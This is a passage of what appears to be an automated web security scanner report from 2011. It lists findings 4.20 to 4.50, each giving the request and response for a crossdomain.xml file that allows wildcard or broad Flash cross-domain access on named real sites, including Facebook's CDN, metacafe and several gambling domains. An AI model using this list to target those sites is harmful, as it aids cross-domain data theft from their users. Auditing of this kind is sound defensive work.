Expires: Tue, 17 May 2011 12:49:40 GMT
Content-Type: text/xml
Content-Length: 207
Date: Mon, 16 May 2011 12:49:40 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.20. http://platform.ak.fbcdn.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://platform.ak.fbcdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: platform.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Mon, 16 May 2011 12:47:15 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.21. http://poker.bet365.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://poker.bet365.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: poker.bet365.com

Response

HTTP/1.1 200 OK
Content-Length: 234
Content-Type: text/xml
Last-Modified: Wed, 15 Oct 2008 15:52:03 GMT
Accept-Ranges: bytes
ETag: "80d364f7dd2ec91:76ef"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:20:41 GMT
Connection: keep-alive

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.22. http://res.mccont.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://res.mccont.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: res.mccont.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sun, 04 Jan 2009 11:17:10 GMT
ETag: "34ec3d0-cb-45fa650b39980"
Accept-Ranges: bytes
Content-Length: 203
Content-Type: text/xml
Date: Mon, 16 May 2011 12:49:29 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.23. http://s.mcstatic.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s.mcstatic.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s.mcstatic.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 03 Mar 2011 16:22:13 GMT
ETag: "1f7026e-d0-49c3e3a02a580"
Server: Apache
Accept-Ranges: bytes
Content-Length: 208
Content-Type: application/xml
Date: Mon, 16 May 2011 12:49:28 GMT
Connection: close
Cache-Control: max-age=2592000
Expires: Wed, 15 Jun 2011 11:51:15 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

4.24. http://s0.2mdn.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 16 May 2011 10:45:39 GMT
Expires: Fri, 13 May 2011 10:43:36 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 5388
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.25. http://s1.mcstatic.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s1.mcstatic.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s1.mcstatic.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 03 Mar 2011 16:22:13 GMT
ETag: "1f7026e-d0-49c3e3a02a580"
Server: Apache
Accept-Ranges: bytes
Content-Length: 208
Content-Type: application/xml
Date: Mon, 16 May 2011 12:49:27 GMT
Connection: close
Cache-Control: max-age=2592000
Expires: Wed, 15 Jun 2011 11:51:15 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

4.26. http://s3.mcstatic.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s3.mcstatic.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s3.mcstatic.com

Response

4.27. http://s4.mcstatic.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s4.mcstatic.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s4.mcstatic.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 03 Mar 2011 16:22:13 GMT
ETag: "1f7026e-d0-49c3e3a02a580"
Server: Apache
Accept-Ranges: bytes
Content-Length: 208
Content-Type: application/xml
Date: Mon, 16 May 2011 12:49:27 GMT
Connection: close
Cache-Control: max-age=2592000
Expires: Wed, 15 Jun 2011 11:51:15 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

4.28. http://s6.mcstatic.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s6.mcstatic.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s6.mcstatic.com

Response

4.29. http://secure-us.imrworldwide.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:30 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 23 May 2011 12:49:30 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

4.30. http://spe.atdmt.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://spe.atdmt.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Expires: Mon, 23 May 2011 12:36:15 GMT
Date: Mon, 16 May 2011 12:52:12 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.31. http://static.getclicky.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.getclicky.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: static.getclicky.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 May 2011 12:31:48 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Thu, 28 Jun 2007 14:35:20 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.32. https://static.getclicky.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://static.getclicky.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: static.getclicky.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 May 2011 12:44:35 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Thu, 28 Jun 2007 14:35:20 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.33. http://va.px.invitemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://va.px.invitemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: va.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 12:52:09 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.34. http://winter.metacafe.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://winter.metacafe.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: winter.metacafe.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:31 GMT
Server: Apache
Last-Modified: Mon, 09 Aug 2010 08:58:38 GMT
ETag: "cc10e5-d0-48d6038e8cb80"
Accept-Ranges: bytes
Content-Length: 208
Cache-Control: max-age=2592000
Expires: Wed, 15 Jun 2011 12:49:31 GMT
Vary: Accept-Encoding,User-Agent
Edge-control: !no-store,cache-maxage=3603
Keep-Alive: timeout=2, max=48
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

4.35. https://www.betsson.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.betsson.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 11 Jan 2008 13:00:48 GMT
Accept-Ranges: bytes
ETag: "0c02dfc5154c81:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:35 GMT
Connection: close
Content-Length: 208
Set-Cookie: BIGipServerwww.betsson.com=699339180.20480.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

4.36. http://www.huddletogether.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huddletogether.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.huddletogether.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:12:17 GMT
Server: Apache
Last-Modified: Sun, 21 May 2006 19:01:08 GMT
ETag: "317417c-cb-4145102292500"
Accept-Ranges: bytes
Content-Length: 203
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-poli
...[SNIP]...

4.37. http://www.metacafe.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.metacafe.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.metacafe.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 03 Mar 2011 16:22:13 GMT
ETag: "156a2de-d0-49d966e98b740"
Accept-Ranges: bytes
Content-Length: 208
Content-Type: application/xml
Cache-Control: max-age=86400
Date: Mon, 16 May 2011 12:25:15 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

4.38. http://www.neogames.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.neogames.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.neogames.com

Response

HTTP/1.1 200 OK
Content-Length: 287
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 11:24:37 GMT
Accept-Ranges: bytes
ETag: "34cdc3c714becb1:d66"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:35:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

4.39. http://bigmoneyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bigmoneyscratch.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:20:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ix55uumghyhpvpjpxar2rc55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.40. http://br.bigmoneyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://br.bigmoneyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: br.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:10:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=djr3rmjotuye0o45j01o20ii; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.41. http://br.karamba.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://br.karamba.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: br.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=xkmxm445qmndxh3rwx1ohgm4; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.42. http://da.bigmoneyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://da.bigmoneyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: da.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:14:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=b2kkxkynjn03ii3ktrw0ah55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.43. http://da.crazyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://da.crazyscratch.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: da.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 08:47:18 GMT
Accept-Ranges: bytes
ETag: "7c4663cf47b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:31:56 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="crazyscratch.com" />
<allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.44. http://da.karamba.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://da.karamba.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: da.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:24:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ozyfv2jniwov5p55hdjmeu45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.45. http://da.scratch2cash.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://da.scratch2cash.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: da.scratch2cash.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=whxbooqaqnnlxub0dxcbm245; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.46. http://da.scratchcardheaven.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://da.scratchcardheaven.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: da.scratchcardheaven.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uazqnomqt2gc1w45rkqvqkfe; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.47. http://de.bigmoneyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://de.bigmoneyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: de.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=lx0lck2lrksjyv551wrczxa1; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.48. http://de.crazyscratch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://de.crazyscratch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: de.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 08:47:23 GMT
Accept-Ranges: bytes
ETag: "5e4890d247b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:32:27 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="crazyscratch.com" />
<allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.49. http://de.karamba.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://de.karamba.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: de.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4nrvlj45ijqie445hynujq45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.50. http://de.scratch2cash.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://de.scratch2cash.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
